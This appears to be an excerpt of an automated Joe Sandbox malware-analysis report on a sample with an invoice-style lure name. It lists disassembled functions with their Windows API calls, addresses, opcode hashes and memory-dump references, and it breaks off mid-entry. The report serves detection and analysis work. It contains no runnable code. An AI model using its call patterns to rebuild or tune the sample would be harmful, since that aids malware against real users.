                        • Opcode ID: 4736a7ed84ba38223614b68497af299c9378bf3f7de87682615eb643772a4851
                        • Instruction ID: d75bf8ad1599175ec201d21c5d7effb6d7155550864280770bf9433e5d101342
                        • Opcode Fuzzy Hash: 4736a7ed84ba38223614b68497af299c9378bf3f7de87682615eb643772a4851
                        • Instruction Fuzzy Hash: 5221A172A001249FCB11DF69D894A9ABBFCEF49750F00816AF809D7291DA749A45CF90
                        Function 002F18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002F2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002F18FD,?,?,?,002F26BC,00000000,000000EF,00000119,?,?), ref: 002F2CB9
                          • Part of subcall function 002F2CAA: lstrcpyW.KERNEL32(00000000,?,?,002F18FD,?,?,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F2CDF
                          • Part of subcall function 002F2CAA: lstrcmpiW.KERNEL32(00000000,?,002F18FD,?,?,?,002F26BC,00000000,000000EF,00000119,?,?), ref: 002F2D10
                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F1916
                        • lstrcpyW.KERNEL32(00000000,?,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F193C
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F1970
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen
                        • String ID: cdecl
                        • API String ID: 4031866154-3896280584
                        • Opcode ID: bda3001ec42c244a817ee58a834976a2a3e3a82932e4e87d1bc1bcd3d745acba
                        • Instruction ID: 26ec5c803127067ec1e206a4a64d9961713d549848bb403c479d6004b711dce9
                        • Opcode Fuzzy Hash: bda3001ec42c244a817ee58a834976a2a3e3a82932e4e87d1bc1bcd3d745acba
                        • Instruction Fuzzy Hash: 7011B13612030AEFDB15AF34D855D7AB7A8FF45390F80802AF906CB264EB7198758BD0
                        Function 002E3D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 002E3D65
                          • Part of subcall function 002D45EC: __FF_MSGBANNER.LIBCMT ref: 002D4603
                          • Part of subcall function 002D45EC: __NMSG_WRITE.LIBCMT ref: 002D460A
                          • Part of subcall function 002D45EC: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,?,?,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D462F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: 560b3965bbf7f2f652702375ab664c062b6b739beee504307d0587b042c810c3
                        • Instruction ID: d900e372ac25cb2996cf1f2ab03f35f92d1eb7c7c66e7d1e8be380d9cd416e12
                        • Opcode Fuzzy Hash: 560b3965bbf7f2f652702375ab664c062b6b739beee504307d0587b042c810c3
                        • Instruction Fuzzy Hash: 0211E732560256EBCB317F71AC486993B9CAF10362F904526F949CB291DF748E60DA50
                        Function 002B1E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002B1E87
                          • Part of subcall function 002B38E4: _memset.LIBCMT ref: 002B3965
                          • Part of subcall function 002B38E4: _wcscpy.LIBCMT ref: 002B39B5
                          • Part of subcall function 002B38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 002B39C6
                        • KillTimer.USER32(?,00000001), ref: 002B1EDC
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B1EEB
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00324526
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                        • String ID:
                        • API String ID: 1378193009-0
                        • Opcode ID: 63a4b8f400358a2fc94f91c0ecbfc608e6a2b095b837c33d6d203ddb0c9fbec4
                        • Instruction ID: 0982494388740346d15b8a35659d82276f2406dc1ed0d13844e82c9a49b8700f
                        • Opcode Fuzzy Hash: 63a4b8f400358a2fc94f91c0ecbfc608e6a2b095b837c33d6d203ddb0c9fbec4
                        • Instruction Fuzzy Hash: D521F6B1904794AFE7338B249855FEBBBEC9B02308F14008DE69E56141C7745A94CB51
                        Function 002F713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002F715C
                        • _memset.LIBCMT ref: 002F717D
                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002F71CF
                        • CloseHandle.KERNEL32(00000000), ref: 002F71D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle_memset
                        • String ID:
                        • API String ID: 1157408455-0
                        • Opcode ID: 05c0c54af3c109795c8490c5b22cc905659bd2ad5b255f0dcfeaeb7d812d5e0d
                        • Instruction ID: 3a9f6bde6e389d795c376434b343fe7f78f5c44757fe90eb276931ab7df34c9f
                        • Opcode Fuzzy Hash: 05c0c54af3c109795c8490c5b22cc905659bd2ad5b255f0dcfeaeb7d812d5e0d
                        • Instruction Fuzzy Hash: 4711CA71D112287AD7205BA5AC4DFEBBA7CEF45760F1046AAF508E71D0D2744E848BA4
                        Function 002F13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002F13EE
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002F1409
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002F141F
                        • FreeLibrary.KERNEL32(?), ref: 002F1474
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                        • String ID:
                        • API String ID: 3137044355-0
                        • Opcode ID: 1165559b85b1c88ca215ca2aeef9c53e14bc378160e42ced954df1c24be7cbd9
                        • Instruction ID: b36080a65ca5ae8499dc9bf668585f0814acfff479a5387978ce096d9925face
                        • Opcode Fuzzy Hash: 1165559b85b1c88ca215ca2aeef9c53e14bc378160e42ced954df1c24be7cbd9
                        • Instruction Fuzzy Hash: 3E218C7591020DEBDB20DF90EC88AEAFBBCEF40790F808579A61297110D774EA249F50
                        Function 003092C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,002FAEA5,?,?,00000000,00000008), ref: 002CF282
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,002FAEA5,?,?,00000000,00000008), ref: 002CF2A6
                        • gethostbyname.WSOCK32(?,?,?), ref: 003092F0
                        • WSAGetLastError.WSOCK32(00000000), ref: 003092FB
                        • _memmove.LIBCMT ref: 00309328
                        • inet_ntoa.WSOCK32(?), ref: 00309333
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                        • String ID:
                        • API String ID: 1504782959-0
                        • Opcode ID: 2d54968a07481dca115bd580b954ba2162d5dbc395225ebf2cac882f117dd096
                        • Instruction ID: f4b77316ba73e9bbe44b4552c81e461dfd5221b9de174e3ccd297e773dc1645a
                        • Opcode Fuzzy Hash: 2d54968a07481dca115bd580b954ba2162d5dbc395225ebf2cac882f117dd096
                        • Instruction Fuzzy Hash: 50114C75500109AFCB05FBA0DD56DEEB7BDAF04350B104065F506AB1A2DB30AE14CF51
                        Function 002EC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 002EC285
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002EC297
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002EC2AD
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002EC2C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: d21c32bedbd721fc73f1a5f06023cb2b33ed612d72996fe8ed71e296d99f6432
                        • Instruction ID: fa435efa3fc06d8b9194d20bbbc0ad077cec13d5323e776f7685cd77a1e2de52
                        • Opcode Fuzzy Hash: d21c32bedbd721fc73f1a5f06023cb2b33ed612d72996fe8ed71e296d99f6432
                        • Instruction Fuzzy Hash: E2112A7A940218FFDB11DFE9CC85E9DBBB8FB08710F604091EA04B7294D671AE11DB94
                        Function 002F7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 002F7C6C
                        • MessageBoxW.USER32(?,?,?,?), ref: 002F7C9F
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002F7CB5
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002F7CBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 1c05ba4be3d6127bbd1450be2d15db92cb93802a2f9919b8eaa0892f0dbf7584
                        • Instruction ID: cce00a0ff9b23749d4d36b3a55561b3d2121585b3d4d70e62a76e0627ba61954
                        • Opcode Fuzzy Hash: 1c05ba4be3d6127bbd1450be2d15db92cb93802a2f9919b8eaa0892f0dbf7584
                        • Instruction Fuzzy Hash: 5C112B72A14248BFC7139F6CEC48AAABFAD9B04364F154226FA25E3351D6708D548760
                        Function 002CC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                        • GetStockObject.GDI32(00000011), ref: 002CC66B
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateMessageObjectSendStockWindow
                        • String ID:
                        • API String ID: 3970641297-0
                        • Opcode ID: df875d6abc269d8c06cee2367fb58a1ae88bf1cd706cc6769e4b76fd128c73e9
                        • Instruction ID: f2a664f135ad31378f5b7004d80c1f1b979fb951cd0ed5245526cec363ef00af
                        • Opcode Fuzzy Hash: df875d6abc269d8c06cee2367fb58a1ae88bf1cd706cc6769e4b76fd128c73e9
                        • Instruction Fuzzy Hash: 3411AD72511649BFDB124FA0AD81FEABB6DEF48364F254219FA1852020C732DC60DBA0
                        Function 002F49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F49EE
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F4A13
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F4A1D
                        • Sleep.KERNEL32(?,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F4A50
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: ba433f779b2e44aa114e7f4e13d58770be7c4663a76fee910742d947ac31b8c2
                        • Instruction ID: 4feb82b8b3608790a8a24239a170c14b5bdee0f263f3f0aef55e3223c65838a1
                        • Opcode Fuzzy Hash: ba433f779b2e44aa114e7f4e13d58770be7c4663a76fee910742d947ac31b8c2
                        • Instruction Fuzzy Hash: 20115A31D5051DDBDF00AFA4EA99AEEBB78FF09781F014065EA41B2250CBB09560CBA9
                        Function 002E5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                        • Instruction ID: d5a672b286cc5e1af4507382c61b5c037a29c83a80bc9e50db34aee6281be54c
                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                        • Instruction Fuzzy Hash: B20172320A069EBBCF125F85DC51CED3F22BB18758F948415FE1859031C232C9B1AB81
                        Function 002D80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002D869D: __getptd_noexit.LIBCMT ref: 002D869E
                        • __lock.LIBCMT ref: 002D811F
                        • InterlockedDecrement.KERNEL32(?), ref: 002D813C
                        • _free.LIBCMT ref: 002D814F
                        • InterlockedIncrement.KERNEL32(01697968), ref: 002D8167
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 2704283638-0
                        • Opcode ID: bbc03fc33d0fda78e0c3724ed02da62958742b6019734d8d3b70550733bf7bd8
                        • Instruction ID: b35085cd9272b7b8b51b1994ff350279586c3169a78aea013bacb50426c5386e
                        • Opcode Fuzzy Hash: bbc03fc33d0fda78e0c3724ed02da62958742b6019734d8d3b70550733bf7bd8
                        • Instruction Fuzzy Hash: FD01C035925A12ABCB12AF2498067ADB3B4BF04720F14400BF41867790DF74EC26CFD2
                        Function 0031DDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 0031DE07
                        • ScreenToClient.USER32(?,?), ref: 0031DE1F
                        • ScreenToClient.USER32(?,?), ref: 0031DE43
                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0031DE5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        • Opcode ID: 5d934662577c20ed5aebdeae1d2ba3b3cd46001b302c83abb3be5ed1990d9c79
                        • Instruction ID: 0c43231e96f784225cf3176496a06d8566a4982e6cfac2802b6aa109abf3f1cb
                        • Opcode Fuzzy Hash: 5d934662577c20ed5aebdeae1d2ba3b3cd46001b302c83abb3be5ed1990d9c79
                        • Instruction Fuzzy Hash: B211F0B9D00209EFDB41DF99D8859EEBBF9FB08310F508166E925E3210D735AA55CF50
                        Function 002F9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                        Download Yara Rule
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 002F9C7F
                          • Part of subcall function 002FAD14: _memset.LIBCMT ref: 002FAD49
                        • _memmove.LIBCMT ref: 002F9CA2
                        • _memset.LIBCMT ref: 002F9CAF
                        • LeaveCriticalSection.KERNEL32(?), ref: 002F9CBF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalSection_memset$EnterLeave_memmove
                        • String ID:
                        • API String ID: 48991266-0
                        • Opcode ID: 3a815a5c94c514bda07891d8c61930f61f86380727b33ea448d57f6b7f149ebf
                        • Instruction ID: 2bfdd7ac3f9ff71b654a0d49d24ab02a9923e5c32e341be7a1e27af1d953c72f
                        • Opcode Fuzzy Hash: 3a815a5c94c514bda07891d8c61930f61f86380727b33ea448d57f6b7f149ebf
                        • Instruction Fuzzy Hash: E8F0307A200104ABDB026F54EC85A9AFB29EF49360F08C065FE089E217C731A821DFB5
                        Function 0031E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002CB5EB
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB5FA
                          • Part of subcall function 002CB58B: BeginPath.GDI32(?), ref: 002CB611
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB63B
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0031E860
                        • LineTo.GDI32(00000000,?,?), ref: 0031E86D
                        • EndPath.GDI32(00000000), ref: 0031E87D
                        • StrokePath.GDI32(00000000), ref: 0031E88B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        • Opcode ID: fc27745c8b090792987344741be966e7b3ef9fc99ab021945bb7c6f7e522caf3
                        • Instruction ID: cfde055852fa03140553df706385bceea4c46548e85e3bcff33c98bcf46fd258
                        • Opcode Fuzzy Hash: fc27745c8b090792987344741be966e7b3ef9fc99ab021945bb7c6f7e522caf3
                        • Instruction Fuzzy Hash: 6AF05E32005259BBDB1B5F54AC0AFCA3FADAF0AB11F048141FE15250E1877655A1CF95
                        Function 002ED623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002ED640
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 002ED653
                        • GetCurrentThreadId.KERNEL32 ref: 002ED65A
                        • AttachThreadInput.USER32(00000000), ref: 002ED661
                        Memory Dump Source
